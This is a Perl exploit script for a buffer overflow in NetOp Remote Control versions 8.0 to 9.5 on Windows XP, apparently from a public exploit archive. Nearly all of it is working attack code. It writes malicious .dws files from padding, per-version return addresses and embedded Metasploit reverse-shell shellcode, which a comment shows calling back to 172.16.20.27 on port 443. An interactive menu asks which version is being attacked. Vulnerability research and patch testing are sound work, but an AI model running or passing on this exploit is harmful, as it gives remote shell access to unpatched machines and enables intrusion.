# Exploit Title: NetOp Remote Control Buffer Overflow # Date: April 28, 2011 # Author: chap0 # Version: 8.0, 9.1, 9.2, 9.5 (Possibly anything before ver 10) # Upgrade to Version 10 for fix # Tested on: Windows XP SP3 # # Greetz to JJ IE by day Ninja by night, br34dcrumb5, myne-us, Exploit-DB, Corelan # # #!/usr/bin/perl $file0 = "netop80.dws"; $file1 = "netop91.dws"; $file2 = "netop92.dws"; $file3 = "netop95.dws"; my $junk="\x41" x 524; my $ret0 = "\x9B\xC2\x40\x20"; #0x2040C29B [nupdate.dll] my $ret1 = "\xB3\xE9\x3D\x20"; #0x203DE9B3 [nupdate.dll] my $ret2 = "\x1B\xFC\x44\x20"; #0x2044FC1B [nupdate.dll] my $ret3 = "\x13\x26\xB5\x20"; #0x20B52613 [nupdate.dll] my $extra = "\x41" x 20; #./msfpayload windows/shell_reverse_tcp LHOST=172.16.20.27 LPORT=443 R | msfencode -a x86 -b '\x00\x0a\x0d' -t perl #[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1) my $shellcode= "\xb8\x34\xc1\xf5\xcc\xdb\xd1\xd9\x74\x24\xf4\x5a\x33\xc9" . "\xb1\x4f\x31\x42\x14\x03\x42\x14\x83\xc2\x04\xd6\x34\x09" . "\x24\x9f\xb7\xf2\xb5\xff\x3e\x17\x84\x2d\x24\x53\xb5\xe1" . "\x2e\x31\x36\x8a\x63\xa2\xcd\xfe\xab\xc5\x66\xb4\x8d\xe8" . "\x77\x79\x12\xa6\xb4\x18\xee\xb5\xe8\xfa\xcf\x75\xfd\xfb" . "\x08\x6b\x0e\xa9\xc1\xe7\xbd\x5d\x65\xb5\x7d\x5c\xa9\xb1" . "\x3e\x26\xcc\x06\xca\x9c\xcf\x56\x63\xab\x98\x4e\x0f\xf3" . "\x38\x6e\xdc\xe0\x05\x39\x69\xd2\xfe\xb8\xbb\x2b\xfe\x8a" . "\x83\xe7\xc1\x22\x0e\xf6\x06\x84\xf1\x8d\x7c\xf6\x8c\x95" . "\x46\x84\x4a\x10\x5b\x2e\x18\x82\xbf\xce\xcd\x54\x4b\xdc" . "\xba\x13\x13\xc1\x3d\xf0\x2f\xfd\xb6\xf7\xff\x77\x8c\xd3" . "\xdb\xdc\x56\x7a\x7d\xb9\x39\x83\x9d\x65\xe5\x21\xd5\x84" . "\xf2\x53\xb4\xc0\x37\x69\x47\x11\x50\xfa\x34\x23\xff\x50" . "\xd3\x0f\x88\x7e\x24\x6f\xa3\xc6\xba\x8e\x4c\x36\x92\x54" . "\x18\x66\x8c\x7d\x21\xed\x4c\x81\xf4\xa1\x1c\x2d\xa7\x01" . "\xcd\x8d\x17\xe9\x07\x02\x47\x09\x28\xc8\xfe\x0e\xbf\x5f" . "\x10\x84\x5b\xc8\x13\xa4\x5a\xb3\x9d\x42\x36\xd3\xcb\xdd" . "\xaf\x4a\x56\x95\x4e\x92\x4c\x3d\xf2\x01\x0b\xbd\x7d\x3a" . "\x84\xea\x2a\x8c\xdd\x7e\xc7\xb7\x77\x9c\x1a\x21\xbf\x24" . "\xc1\x92\x3e\xa5\x84\xaf\x64\xb5\x50\x2f\x21\xe1\x0c\x66" . "\xff\x5f\xeb\xd0\xb1\x09\xa5\x8f\x1b\xdd\x30\xfc\x9b\x9b" . "\x3c\x29\x6a\x43\x8c\x84\x2b\x7c\x21\x41\xbc\x05\x5f\xf1" . "\x43\xdc\xdb\x01\x0e\x7c\x4d\x8a\xd7\x15\xcf\xd7\xe7\xc0" . "\x0c\xee\x6b\xe0\xec\x15\x73\x81\xe9\x52\x33\x7a\x80\xcb" . "\xd6\x7c\x37\xeb\xf2"; print<<EOF; NetOp Remote Control Buffer Overflow By chap0 - www.seek-truth.net Choose a number for the version of NetOp are you attacking: 0 - NetOp 8.0 1 - NetOp 9.1 2 - NetOp 9.2 3 - Netop 9.5 EOF print "Selection: "; chomp ($select = <STDIN>); if ($select =~ 0) { print "Creating payload for NetOp 8.0\n"; my $payload=$junk.$ret0.$extra.$shellcode; open(FILE,">$file0"); print FILE $payload; close(FILE); print "Done.\n"; } elsif ($select =~ 1) { print "Creating payload for NetOp 9.1\n"; my $payload=$junk.$ret1.$extra.$shellcode; open(FILE,">$file1"); print FILE $payload; close(FILE); print "Done.\n"; } elsif ($select =~ 2) { print "Creating payload for NetOp 9.2\n"; my $payload=$junk.$ret2.$extra.$shellcode; open(FILE,">$file2"); print FILE $payload; close(FILE); print "Done.\n"; } elsif ($select =~ 3) { print "Creating payload for NetOp 9.5\n"; my $payload=$junk.$ret3.$extra.$shellcode; open(FILE,">$file3"); print FILE $payload; close(FILE); print "Done.\n"; } elsif ($select =~ '') { print "Please make a selection.\n"; }